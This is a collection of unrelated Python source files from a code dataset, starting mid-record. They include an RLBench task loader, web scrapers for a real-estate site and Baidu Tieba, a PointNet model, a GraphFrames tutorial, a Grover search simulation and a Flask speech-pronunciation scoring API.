self.clear_weights()\n\n def base_rotation_bounds(\n self,\n ) -> Tuple[Tuple[float, float, float], Tuple[float, float, float]]:\n \"\"\"Defines how much the task base can rotate during episode placement.\n\n Default is set such that it can rotate any amount on the z axis.\n\n :return: A tuple containing the min and max (x, y, z) rotation bounds\n (in radians).\n \"\"\"\n return (0.0, 0.0, 0), (0.0, 0.0, 0)\n\n def load(self) -> Object:\n if Object.exists(self.name):\n return Dummy(self.name)\n ttm_file = os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n './task_ttms/%s.ttm' % self.name)\n if not os.path.isfile(ttm_file):\n raise FileNotFoundError(\n 'The following is not a valid task .ttm file: %s' % ttm_file)\n self._base_object = self.pyrep.import_model(ttm_file)\n return self._base_object","repo_name":"xf-zhao/Matcha-agent","sub_path":"NICOL/rlbench_tasks/knocking.py","file_name":"knocking.py","file_ext":"py","file_size_in_byte":11892,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"74271032515","text":"import chardet\nimport aiohttp\nimport traceback\nimport lxml.html\nfrom bs4 import BeautifulSoup\nimport logging\n\nfrom abc import ABCMeta, abstractmethod\nfrom builtins import Exception\nimport asyncio\nfrom time import sleep\nfrom django.db import models\n\n\nclass ReadPropertyNameException(Exception):\n\n def __init__(self):\n logging.info('Can not read property name')\n\n\nclass LoadPropertyPageException(Exception):\n\n def __init__(self):\n logging.info('Can not load property page')\n\n\nclass ParserBase(metaclass=ABCMeta):\n\n @abstractmethod\n def getCharset(self):\n pass\n\n @abstractmethod\n def createEntity(self)->models.Model:\n return None\n \n @abstractmethod\n def _parsePropertyDetailPage(self, item:models.Model, response:BeautifulSoup)->models.Model:\n return item\n \n async def parsePropertyDetailPage(self, session, url)->models.Model:\n item:models.Model = self.createEntity()\n try:\n item.pageUrl = url\n response:BeautifulSoup = await self.getResponseBs(session, url)\n item = self._parsePropertyDetailPage(item, response)\n except (LoadPropertyPageException, TimeoutError) as e:\n raise e\n except (ReadPropertyNameException) as e:\n raise e\n except Exception as e:\n logging.error('Detail parse error:' + url)\n logging.error(traceback.format_exc())\n raise e\n return item\n\n async def _parsePageCore(self, response, getXpath , getDestUrl):\n linklist = response.xpath(getXpath())\n for linkUrl in linklist:\n destUrl = getDestUrl(linkUrl)\n logging.debug(destUrl)\n yield destUrl\n\n async def parsePage(self, session, url, getXpath , getDestUrl):\n response = await self.getResponse(session, url, self.getCharset()) \n async for destUrl in self._parsePageCore(response, getXpath, getDestUrl):\n yield destUrl\n\n async def parsePageBs(self, session, url, getXpath , getDestUrl):\n response = await self.getResponseBs(session, url, self.getCharset())\n linklist = response.xpath(getXpath())\n for linkUrl in linklist:\n destUrl = getDestUrl(linkUrl)\n logging.info(destUrl)\n yield destUrl\n\n async def _get(self, session, url):\n try:\n r = await session.get(url)\n except (asyncio.TimeoutError, TimeoutError, aiohttp.client_exceptions.ClientConnectorError, aiohttp.client_exceptions.ServerDisconnectedError):\n sleep(10000)\n r = await session.get(url)\n return r\n \n async def _getContent(self, session, url):\n try:\n r = await self._get(session, url)\n # r = await session.get(url)\n content = await r.content.read()\n return content\n except aiohttp.ClientError as e:\n logging.error(traceback.format_exc())\n raise e\n except (Exception) as e:\n logging.error(traceback.format_exc())\n raise e\n \n async def getResponse(self, session, url, charset=None):\n\n async def getDocument():\n content = await self._getContent(session, url)\n if (charset is None):\n encoding = self.getCharset()\n if(encoding is None):\n encoding = chardet.detect(content)[\"encoding\"]\n else:\n encoding = charset\n return lxml.html.fromstring(html=content, parser=lxml.html.HTMLParser(encoding=encoding))\n\n try:\n return await getDocument()\n except(TypeError):\n return await getDocument()\n\n async def getResponseBs(self, session, url, charset=None) -> BeautifulSoup:\n\n async def getDocument():\n content = await self._getContent(session, url)\n if (charset is None):\n encoding = self.getCharset()\n if(encoding is None):\n encoding = chardet.detect(content)[\"encoding\"]\n else:\n encoding = charset\n return BeautifulSoup(content, \"html.parser\", from_encoding=encoding)\n\n try:\n return await getDocument()\n except(TypeError):\n return await getDocument()\n","repo_name":"AnaharaYasuo/realestate_crawler","sub_path":"src/function/sumifu/package/parser/baseParser.py","file_name":"baseParser.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40501494255","text":"\"\"\"\nImplementation of the PointNet model using pytorch\n\"\"\"\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom collections import OrderedDict\nimport torch_geometric.transforms as T\nfrom torch.nn import Linear\nimport torch.nn.functional as F\nfrom torch_geometric.nn import MLP, DynamicEdgeConv, global_max_pool\n\n\nfrom blip.models.common import activations, normalizations\nfrom blip.models import GenericModel\n\npointnet_unsupervised_config = {\n # input dimension\n 'input_dimension': 3,\n # number of dynamic edge convs\n 'num_dynamic_edge_conv': 2,\n # edge conv layer values\n 'edge_conv_mlp_layers': [\n [64, 64],\n [64, 64]\n ],\n 'number_of_neighbors': 20,\n 'aggregation_operators': [\n 'sum', 'sum'\n ],\n # linear layer\n 'linear_output': 128,\n 'mlp_output_layers': [128, 256, 32],\n 'augmentations': [\n T.RandomJitter(0.03), \n T.RandomFlip(1), \n T.RandomShear(0.2)\n ],\n # number of augmentations per batch\n 'number_of_augmentations': 2\n}\n\nclass PointNetUnsupervised(GenericModel):\n \"\"\"\n \"\"\"\n def __init__(self,\n name: str='pointnet_unsupervised',\n cfg: dict=pointnet_unsupervised_config\n ):\n super(PointNetUnsupervised, self).__init__(name, cfg)\n self.cfg = cfg\n self.augmentation = T.Compose(self.cfg['augmentations'])\n\n # construct the model\n self.forward_views = {}\n self.forward_view_map = {}\n # construct the model\n self.construct_model()\n # register hooks\n self.register_forward_hooks()\n\n def construct_model(self):\n \"\"\"\n \n \"\"\"\n \"\"\"\n The current methodology is to create an ordered\n dictionary and fill it with individual modules.\n \"\"\"\n self.logger.info(f\"Attempting to build chunc architecture using cfg: {self.cfg}\")\n _edge_conv_dict = OrderedDict()\n _linear_dict = OrderedDict()\n _mlp_dict = OrderedDict()\n\n self.input_dimension = self.cfg['input_dimension']\n _input_dimension = self.cfg['input_dimension']\n _num_edge_conv_outputs = 0\n # Feature extraction\n # an example would be\n # self.conv1 = DynamicEdgeConv(MLP([2 * 3, 64, 64]), k, aggr)\n # self.conv2 = DynamicEdgeConv(MLP([2 * 64, 128]), k, aggr)\n for ii in range(self.cfg['num_dynamic_edge_conv']):\n _edge_conv_dict[f'edge_conv_{ii}'] = DynamicEdgeConv(\n MLP([2 * _input_dimension] + self.cfg['edge_conv_mlp_layers'][ii]), \n self.cfg['number_of_neighbors'],\n self.cfg['aggregation_operators'][ii]\n )\n _input_dimension = self.cfg['edge_conv_mlp_layers'][ii][-1]\n _num_edge_conv_outputs += _input_dimension\n \n # add linear layer Encoder head\n _linear_dict[f'linear_layer'] = Linear(\n _num_edge_conv_outputs, \n self.cfg['linear_output']\n )\n\n # add output mlp Projection head (See explanation in SimCLRv2)\n _mlp_dict[f'mlp_output'] = MLP(\n self.cfg['mlp_output_layers']\n )\n \n # create the dictionaries\n self.edge_conv_dict = nn.ModuleDict(_edge_conv_dict)\n self.linear_dict = nn.ModuleDict(_linear_dict)\n self.mlp_dict = nn.ModuleDict(_mlp_dict)\n\n # record the info\n self.logger.info(f\"Constructed BLIP with dictionaries:\\n{self.edge_conv_dict}\\n{self.linear_dict}\\n{self.mlp_dict}.\")\n\n \n def forward(self,\n x\n ):\n \"\"\"\n Iterate over the model dictionary\n \"\"\"\n x = x.to(self.device)\n # if self.training:\n # Get augmentations of the batch\n embeddings, pools, reductions = [], [], []\n for ii in range(self.cfg['number_of_augmentations']):\n augmentations = self.augmentation(x)\n pos, batch = augmentations.pos, augmentations.batch\n for ii, layer in enumerate(self.embedding_dict.keys()):\n pos = self.embedding_dict[layer](pos, batch)\n if ii == 0:\n linear_input = pos\n else:\n linear_input = torch.cat([linear_input, pos], dim=1)\n\n linear_output = self.reduction_dict['linear_layer'](linear_input)\n linear_pool = global_max_pool(linear_output, batch)\n linear_reduction = self.reduction_dict['mlp_output'](linear_pool)\n\n embeddings.append(linear_input)\n pools.append(linear_pool)\n reductions.append(linear_reduction)\n\n embeddings = torch.cat(embeddings)\n reductions = torch.cat(reductions)\n pools = torch.cat(pools)\n\n return {\n 'embeddings': embeddings,\n 'pools': pools, \n 'reductions': reductions, \n }\n \n def forward_eval(self,\n x\n ):\n \"\"\"\n Iterate over the model dictionary\n \"\"\"\n x = x.to(self.device)\n # if self.training:\n pos, batch = x.pos, x.batch\n for ii, layer in enumerate(self.edge_conv_dict.keys()):\n pos = self.edge_conv_dict[layer](pos, batch)\n if ii == 0:\n linear_input = pos\n else:\n linear_input = torch.cat([linear_input, pos], dim=1)\n\n linear_output = self.linear_dict['linear_layer'](linear_input)\n linear_pool = global_max_pool(linear_output, batch)\n linear_compact = self.mlp_dict['mlp_output'](linear_pool)\n\n labels = x.category\n\n return linear_pool, linear_compact, labels","repo_name":"Neutron-Calibration-in-DUNE/Blip","sub_path":"blip/models/arxiv/pointnet_unsupervised.py","file_name":"pointnet_unsupervised.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70322315075","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport os\nimport math\nimport time\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pylab as plt\n\n\n# In[2]:\n\nsc.master\n\n\n# In[3]:\n\n# spark related\nfrom pyspark.sql import DataFrameWriter\nfrom pyspark.sql import SQLContext\nsqlContext = SQLContext(sc)\nsql = sqlContext.sql\n\n\n# In[4]:\n\n# graph related\nfrom graphframes import *\n\n\n# In[5]:\n\n# Vertex DataFrame\nv = sqlContext.createDataFrame([\n (\"a\", \"Alice\", 34),\n (\"b\", \"Bob\", 36),\n (\"c\", \"Charlie\", 30),\n (\"d\", \"David\", 29),\n (\"e\", \"Esther\", 32),\n (\"f\", \"Fanny\", 36),\n (\"g\", \"Gabby\", 60)\n], [\"id\", \"name\", \"age\"])\n\n\n# In[6]:\n\n# Edge DataFrame\ne = sqlContext.createDataFrame([\n (\"a\", \"b\", \"friend\"),\n (\"b\", \"c\", \"follow\"),\n (\"c\", \"b\", \"follow\"),\n (\"f\", \"c\", \"follow\"),\n (\"e\", \"f\", \"follow\"),\n (\"e\", \"d\", \"friend\"),\n (\"d\", \"a\", \"friend\"),\n (\"a\", \"e\", \"friend\")\n], [\"src\", \"dst\", \"relationship\"])\n\n\n# In[7]:\n\n# Create a GraphFrame\ng = GraphFrame(v, e)\n\n\n# In[8]:\n\nfrom graphframes.examples import Graphs\ng = Graphs(sqlContext).friends()\n\n\n# In[9]:\n\ng.inDegrees.show()\n\n\n# In[10]:\n\ng.edges.filter(\"relationship = 'follow'\").count()\n\n\n# In[11]:\n\ng.vertices.show()\n\n\n# In[12]:\n\ng.edges.show()\n\n\n# In[13]:\n\n# Find the youngest user's age in the graph.\n# This queries the vertex DataFrame.\ng.vertices.groupBy().min(\"age\").show()\n\n\n# In[14]:\n\n# Count the number of \"follows\" in the graph.\n# This queries the edge DataFrame.\nnumFollows = g.edges.filter(\"relationship = 'follow'\").count()\n\n\n# In[15]:\n\n# Search for pairs of vertices with edges in both directions between them.\nmotifs = g.find(\"(a)-[e]->(b); (b)-[e2]->(a)\")\nmotifs.show()\n\n\n# In[16]:\n\n# More complex queries can be expressed by applying filters.\nmotifs.filter(\"b.age > 30\").show()\n\n\n# In[17]:\n\nfrom pyspark.sql.functions import col, lit, udf, when\nfrom pyspark.sql.types import IntegerType\n\n\n# In[18]:\n\nchain4 = g.find(\"(a)-[ab]->(b); (b)-[bc]->(c); (c)-[cd]->(d)\")\n\n\n# In[19]:\n\n# Query on sequence, with state (cnt)\n# (a) Define method for updating state given the next element of the motif.\nsumFriends = lambda cnt,relationship: when(relationship == \"friend\", cnt+1).otherwise(cnt)\n\n\n# In[20]:\n\n# (b) Use sequence operation to apply method to sequence of elements in motif.\n# In this case, the elements are the 3 edges.\ncondition = reduce(lambda cnt,e: sumFriends(cnt, col(e).relationship), [\"ab\", \"bc\", \"cd\"], lit(0))\n\n\n# In[21]:\n\n# (c) Apply filter to DataFrame.\nchainWith2Friends2 = chain4.where(condition >= 2)\nchainWith2Friends2.show()\n\n\n# In[22]:\n\n# Select subgraph of users older than 30, and edges of type \"friend\"\nv2 = g.vertices.filter(\"age > 30\")\ne2 = g.edges.filter(\"relationship = 'friend'\")\ng2 = GraphFrame(v2, e2)\n\n\n# In[23]:\n\ng2.edges.show()\n\n\n# In[24]:\n\n# Select subgraph based on edges \"e\" of type \"follow\"\n# pointing from a younger user \"a\" to an older user \"b\".\npaths = g.find(\"(a)-[e]->(b)\") .filter(\"e.relationship = 'follow'\") .filter(\"a.age < b.age\")\n\n\n# In[25]:\n\n# \"paths\" contains vertex info. Extract the edges.\ne2 = paths.select(\"e.src\", \"e.dst\", \"e.relationship\")\n\n\n# In[26]:\n\n# Construct the subgraph\ng2 = GraphFrame(g.vertices, e2)\n\n\n# In[27]:\n\n# Search from \"Esther\" for users of age < 32.\npaths = g.bfs(\"name = 'Esther'\", \"age < 32\")\npaths.show()\n\n\n# In[28]:\n\n# Specify edge filters or max path lengths.\ng.bfs(\"name = 'Esther'\", \"age < 32\", edgeFilter=\"relationship != 'friend'\", maxPathLength=3)\n\n\n# In[29]:\n\n# Save vertices and edges as Parquet to some location.\n# g.vertices.write.parquet(\"hdfs://myLocation/vertices\")\n# g.edges.write.parquet(\"hdfs://myLocation/edges\")\n\n# Load the vertices and edges back.\n# sameV = sqlContext.read.parquet(\"hdfs://myLocation/vertices\")\n# sameE = sqlContext.read.parquet(\"hdfs://myLocation/edges\")\n\n","repo_name":"djfire1296/HackNTU_Cathay2017","sub_path":"To_py/GraphExample.py","file_name":"GraphExample.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28634658915","text":"import rpyc\nfrom rpyc.utils.server import ThreadedServer\nimport json\n\nclass MyService(rpyc.Service):\n def exposed_calculateMidpoint(self, data):\n pts = json.loads(data)\n return json.dumps({\n \"x\": (pts[\"x1\"] + pts[\"y1\"]) / 2,\n \"y\": (pts[\"x2\"] + pts[\"y2\"]) / 2,\n })\n\nt = ThreadedServer(MyService, port=8080)\nt.start()\n\n\n\n\n\n","repo_name":"wongjiahau/tcpip-network-application-practicals-answer","sub_path":"p2/async_version/q2server.py","file_name":"q2server.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37042401739","text":"import sys\nimport os\nimport shutil\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom torchvision.models import resnet50\nfrom PIL import Image\n\n\n# detect and move food images to the 'food' folder\ndef is_food(image_path, model, transform, device):\n image = Image.open(image_path)\n image = transform(image).unsqueeze(0).to(device)\n with torch.no_grad():\n outputs = model(image)\n _, predicted = torch.max(outputs, 1)\n return predicted.item() == 1 # the food class\n\n\n# check if the file is an image file (no videos or raw or heic)\ndef is_image(filename):\n return any(\n filename.lower().endswith(extension) for extension in [\".jpg\", \".jpeg\", \".png\"]\n )\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"Usage: python find_food.py \")\n sys.exit(1)\n root_dir = sys.argv[1]\n dest = os.path.join(root_dir, \"food\")\n\n if not os.path.exists(dest):\n os.makedirs(dest)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(f\"using {device}\")\n \n model = resnet50()\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, 2)\n print(\"loading model...\")\n model.load_state_dict(torch.load(\"food_classifier.pth\"))\n model.to(device)\n model.eval()\n\n transform = transforms.Compose(\n [\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ]\n )\n print(\"starting evaluation...\")\n for root, dirs, files in os.walk(root_dir):\n for file in files:\n file_path = os.path.join(root, file)\n if is_image(file_path) and is_food(file_path, model, transform, device):\n shutil.move(file_path, os.path.join(dest, file))\n print(\"o\")\n # if .arw file with same name exists, move that too\n arw_file = os.path.splitext(file)[0]\n arw_path = os.path.join(root, arw_file)\n if os.path.exists(arw_path):\n shutil.move(arw_path, os.path.join(dest, arw_file))\n print(\"o\")\n else:\n print(\".\")\n","repo_name":"irisxu02/photo-scripts","sub_path":"find_food.py","file_name":"find_food.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6198339942","text":"import numpy as np\nimport cupy as cp\nimport matplotlib.pyplot as plt\nimport random, time\nimport quantum_backend_GPU as quantum\n\n\ndef main():\n\ty = [[] for i in range(3)]\n\terrors = [[] for i in range(3)]\n\terror_size_list = [0.01,0.05,0.1]\n\n\tdatabase = []\n\tbits = 5\n\tlength = 2**bits\n\tfor i in range(length):\n\t\tdatabase.append(0)\n\ttargets=1\n\tfor i in range(targets):\n\t\tdatabase[0]=1\n\titerations = int(np.ceil(np.sqrt(len(database)/targets)))\n\n\tdef f(x):\n\t\tif database[x] == 1:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tfor num,error_size in enumerate(error_size_list):\n\t\tprint(\"------------------------------------------\")\n\t\tprint(\"Error Size = {}\".format(error_size))\n\t\tshots = 100\n\t\ttrials = 20\n\t\terrorp_step = 0.2\n\t\terrorp_list = np.array([i*errorp_step for i in range(int(1/errorp_step)+1)])\n\t\tresults = [[] for i in range(int(1/errorp_step)+1)]\n\t\tfor errorp in errorp_list:\n\t\t\tprint(\"Testing errorp={}\".format(errorp))\n\t\t\tfor j in range(trials):\n\t\t\t\ttemp = []\n\t\t\t\tfor i in range(shots):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tJ = quantum.Grover(f,bits,verbose=False)\n\t\t\t\t\t\tt = J.search(iterations,errorp=errorp,error_size=error_size)\n\t\t\t\t\t\tresult = quantum.measure(t)\n\t\t\t\t\t\tif result == 0:\n\t\t\t\t\t\t\ttemp.append(1)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttemp.append(0)\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttemp.append(0)\n\t\t\t\t\tprint(\"Completed {}/{} shots, {}/{} trials\".format(i+1,shots,j,trials),end=\"\\r\",flush=True)\n\t\t\t\tsuccess = np.mean(temp)\n\t\t\t\tresults[int(errorp/errorp_step)].append(success)\n\t\t\tprint(\"Completed {}/{} shots, {}/{} trials\".format(i+1,shots,trials,trials),end=\"\\r\",flush=True)\n\t\t\tprint(\"\\n\")\n\t\tfor result_list in results:\n\t\t\ty[num].append(np.mean(result_list))\n\t\t\terrors[num].append(np.std(result_list)/np.sqrt(trials))\n\n\tb = [-0.05,0,0.05]\n\tshapes = [\"o\",\"v\",\"*\"]\n\t#print(results)\n\tfig,ax=plt.subplots()\n\tfor i in range(3):\n\t\tax.errorbar(errorp_list+b[i], y[i], yerr=errors[i], fmt=shapes[i], ecolor=\"gray\", elinewidth=0.75, capsize=3, label=str(error_size_list[i]))\n\tplt.xticks(errorp_list)\n\tplt.xlabel(\"Probability of error on a qubit\")\n\tplt.ylabel(\"Success Probability\")\n\tplt.legend(title=\"Error Size\")\n\tplt.title(\"\"\"Experimental probability of successfully finding the target\nmeasured over {} trials of {} shots.\nWorking Register = {} Qubits\"\"\".format(trials,shots,bits)\n)\n\tplt.tight_layout()\n\tplt.show()\n\n\nif __name__==\"__main__\":\n\tmain()\n\n","repo_name":"Lemon9247/PHYS379","sub_path":"Code/grover_error_test.py","file_name":"grover_error_test.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4332472617","text":"import matplotlib.pyplot as plt\n\ndef subtract(p0, p1):\n return (p0[0] - p1[0], p0[1], p1[1])\n\ndef dotProduct(p0, p1):\n return (p0[0] * p1[0]) + (p0[1] * p1[1])\n\ndef isInside(triangle, point):\n p0, p1, p2 = triangle[0], triangle[1], triangle[2]\n dxdy = subtract(p1, p0)\n normal = (dxdy[1], -dxdy[0])\n line1_check = dotProduct(subtract(point, p0), normal) > 0\n print(line1_check)\n\n dxdy = subtract(p2,p1)\n normal = (dxdy[1], -dxdy[0])\n line2_check = dotProduct(subtract(point, p1), normal) <0\n print(line2_check)\n\n dxdy = subtract(p0,p2)\n normal = (dxdy[1], -dxdy[0])\n line3_check = dotProduct(subtract(point, p2), normal) > 0\n print(line3_check)\n\n return line1_check and line2_check and line3_check\n\ntriangle = [\n (3, 1),\n (2, 5),\n (7, 3),\n]\n\ninside_point = (3,2)\noutside_point = (2,1)\n\npoints = [inside_point, outside_point]\n\nfor point in points:\n color = 'go' if isInside(triangle, point) else 'ro'\n plt.plot([point[0]], [point[1]], color)\n\nplt.plot([triangle[0][0], triangle[1][0]], [triangle[0][1], triangle[1][1]], 'b')\nplt.plot([triangle[1][0], triangle[2][0]], [triangle[1][1], triangle[2][1]], 'b')\nplt.plot([triangle[0][0], triangle[2][0]], [triangle[0][1], triangle[2][1]], 'b')\nplt.show()","repo_name":"Typelias/AR_Assignments","sub_path":"Assignment7/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32416556752","text":"###############################\n### 爬取百度贴吧的信息 ####\n###############################\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# 抓取网页\ndef get_html(url):\n try:\n r = requests.get(url, timeout=30)\n r.raise_for_status()\n # 这里知道百度贴吧的编码是utf-8,爬取其他页面时建议使用:\n # r.encoding = r.apparent_encoding\n r.encoding = 'utf-8'\n return r.text\n except:\n return \"ERROR\"\n\n\ndef get_content(url):\n \"\"\"\n 分析贴吧的网页文件。整理信息,保存在列表变量中\n \"\"\"\n\n # 初始化一个列表来保存所有帖子的信息\n comments = []\n # 首先,我们需要爬取信息的网页下载到本地\n html = get_html(url)\n # print(html) # 测试\n\n # 解析html\n soup = BeautifulSoup(html, 'lxml')\n # print(soup) # 测试\n\n # 按照之前的分析,找到所有具有'j_thread_list clearfix'属性的标签。返回一个列表\n liTags = soup.find_all('li', class_=' j_thread_list clearfix')\n # print(liTags) # 测试\n\n # 通过循环找到帖子里我们需要的信息\n for li in liTags:\n # 初始化一个字典储存文章信息\n comment = {}\n try:\n # 开始筛选信息\n comment['title'] = li.find('a', class_=\"j_th_tit \").text.strip()\n comment['link'] = \"http://tieba.baidu.com\" + \\\n li.find('a', class_=\"j_th_tit \")['href']\n comment['name'] = li.find('span', class_=\"tb_icon_author \"\n ).text.strip()\n comment['time'] = li.find('span', class_=\"pull-right is_show_create_time\").text.strip()\n comment['replyNum'] = li.find('span', class_=\"threadlist_rep_num center_text\").text.strip()\n comments.append(comment)\n except:\n print(\"出了点小问题, 不要紧:)\",)\n return comments\n\n\ndef Out2File(dict):\n \"\"\"\n 将爬取到的文件写入到本地\n 保存到当前目录的TB.txt贴吧文件中\n \"\"\"\n with open('TB.txt', 'a+', encoding='utf-8') as f:\n for comment in dict:\n f.write('标题:{} \\t 链接:{} \\t 发帖人:{} \\t 发帖时间:{} \\t 回复数量:{} \\n'\n .format(comment['title'], comment['link'], comment['name'], comment['time'], comment['replyNum']))\n print(\"当前页面爬取完成!\")\n f.close()\n\n\ndef main(base_url, deep):\n url_list = []\n # 将所有需要爬取的url存入列表\n for i in range(0, deep):\n url_list.append(base_url + \"&pn=\" + str(50 * i) + \"#\")\n print('所有网页已经下载到本地! 开始筛选信息>>>>>>>>>')\n\n # 循环写入所有的数据\n for url in url_list:\n content = get_content(url)\n Out2File(content)\n # print(content)\n print('所有信息装填完毕!')\n\n\nbase_url = \"http://tieba.baidu.com/f?kw=wp7&ie=utf-8\"\n\nif __name__ == '__main__':\n main(base_url, 10)\n","repo_name":"yijigao/Python_scraper","sub_path":"Tieba_scraper/tie_ba_scraper.py","file_name":"tie_ba_scraper.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2474207040","text":"def fat(a):\n a = int(a)\n if a > 1:\n return a*fat(a-1)\n else:\n if(a==0):\n return 1\n return a\n\n\ndef primofast(b):\n b = int(b)\n divisor = int(b/2)\n while(divisor > 1):\n if(b%divisor == 0 and b != 2):\n return False\n divisor=divisor - 1\n return True\n\n\nn=int(input())\nnumeros = input()\nn = numeros.split()\nfor num in n:\n if(primofast(num) and num != '1'):\n print(str(num)+ '! = ' + str(fat(num)))\n\nprint()","repo_name":"lcmajr99/CompetitiveProgramming","sub_path":"URI/Matematica/3312.py","file_name":"3312.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36953142159","text":"# Load libraries\nimport flask\n\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom pathlib import PurePath\nfrom pydub import AudioSegment\nfrom jiwer import wer\nimport os\n\nword_dict = pd.read_excel(\"ox-api.xlsx\")\n\n# instantiate flask \napp = flask.Flask(__name__)\n\ndef CTCLoss(y_true, y_pred):\n # Compute the training-time loss value\n batch_len = tf.cast(tf.shape(y_true)[0], dtype=\"int64\")\n input_length = tf.cast(tf.shape(y_pred)[1], dtype=\"int64\")\n label_length = tf.cast(tf.shape(y_true)[1], dtype=\"int64\")\n\n input_length = input_length * tf.ones(shape=(batch_len, 1), dtype=\"int64\")\n label_length = label_length * tf.ones(shape=(batch_len, 1), dtype=\"int64\")\n\n loss = keras.backend.ctc_batch_cost(y_true, y_pred, input_length, label_length)\n return loss\n\ncharacters = [x for x in \"abcdefghijklmnopqrstuvwxyz \"]\n# Mapping characters to integers\nchar_to_num = keras.layers.StringLookup(vocabulary=characters, oov_token=\"\")\n# Mapping integers back to original characters\nnum_to_char = keras.layers.StringLookup(\n vocabulary=char_to_num.get_vocabulary(), oov_token=\"\", invert=True\n)\n# An integer scalar Tensor. The window length in samples.\nframe_length = 256\n# An integer scalar Tensor. The number of samples to step.\nframe_step = 160\n# An integer scalar Tensor. The size of the FFT to apply.\n# If not provided, uses the smallest power of 2 enclosing frame_length.\nfft_length = 384\n\ndef encode_testdata(wav_file, label):\n ###########################################\n ## Process the Audio\n ##########################################\n # 1. Read wav file\n file = tf.io.read_file(wav_file)\n # 2. Decode the wav file\n audio, _ = tf.audio.decode_wav(file)\n #print(sample_rate)\n #reduced_noise = nr.reduce_noise(y=audio, sr=44100)\n audio = tf.squeeze(audio, axis=-1)\n # 3. Change type to float\n audio = tf.cast(audio, tf.float32)\n # 4. Get the spectrogram\n spectrogram = tf.signal.stft(\n audio, frame_length=frame_length, frame_step=frame_step, fft_length=fft_length\n )\n # 5. We only need the magnitude, which can be derived by applying tf.abs\n spectrogram = tf.abs(spectrogram)\n spectrogram = tf.math.pow(spectrogram, 0.5)\n # 6. normalisation\n means = tf.math.reduce_mean(spectrogram, 1, keepdims=True)\n stddevs = tf.math.reduce_std(spectrogram, 1, keepdims=True)\n spectrogram = (spectrogram - means) / (stddevs + 1e-10)\n ###########################################\n ## Process the label\n ##########################################\n # 7. Convert label to Lower case\n label = tf.strings.lower(label)\n # 8. Split the label\n label = tf.strings.unicode_split(label, input_encoding=\"UTF-8\")\n # 9. Map the characters in label to numbers\n label = char_to_num(label)\n # 10. Return a dict as our model is expecting two inputs\n return spectrogram, label\n\ndef decode_batch_predictions(pred):\n input_len = np.ones(pred.shape[0]) * pred.shape[1]\n # Use greedy search. For complex tasks, you can use beam search\n results = keras.backend.ctc_decode(pred, input_length=input_len, greedy=True)[0][0]\n # Iterate over the results and get back the text\n output_text = []\n for result in results:\n result = tf.strings.reduce_join(num_to_char(result)).numpy().decode(\"utf-8\")\n output_text.append(result)\n return output_text\n\n# Recreate the exact same model, including its weights and the optimizer\nmodel = tf.keras.models.load_model('finalModel.h5',custom_objects={'CTCLoss':CTCLoss},compile=False)\n# Optimizer\nopt = keras.optimizers.Adam(learning_rate=1e-4)\n# Compile the model and return\nmodel.compile(optimizer=opt, loss=CTCLoss)\n\n# define a predict function as an endpoint \n@app.route(\"/predict\", methods=[\"GET\",\"POST\"])\ndef predict():\n \n data = {\"success\": False}\n if flask.request.method == 'POST':\n params = flask.request.json\n if (params == None):\n params = flask.request.args\n\n # if parameters are found, return a prediction\n if (params != None):\n if 'file' not in flask.request.files:\n flask.flash('No file part')\n return flask.redirect(flask.request.url)\n \n word =flask.request.form.get(\"word\")\n word = word.lower()\n correct_pronun=word_dict[word_dict['word']==word].iloc[:,[1]].to_numpy()[0][0].lower()\n \n file = flask.request.files['file']\n print(file.content_type)\n final_name =file.filename.split(\".\")[0] + \".wav\"\n flac_tmp_audio_data = AudioSegment.from_file(file, format=\"m4a\")\n flac_tmp_audio_data.export(final_name, format=\"wav\", parameters=['-acodec', 'pcm_s16le', '-ac', '1', '-ar', '44100'])\n test_data = encode_testdata(final_name,'take')\n X,y = test_data\n matrix = X[np.newaxis,...]\n batch_predictions = model.predict(matrix)\n batch_predictions = decode_batch_predictions(batch_predictions)\n print(batch_predictions)\n print([correct_pronun])\n wer_score = wer([correct_pronun],batch_predictions )\n data[\"target\"] = str(correct_pronun)\n data[\"prediction\"] = str(batch_predictions[0])\n data[\"score\"] = str(1-wer_score)\n #os.remove(final_name)\n data[\"success\"] = True\n\n # return a response in json format \n return flask.jsonify(data) 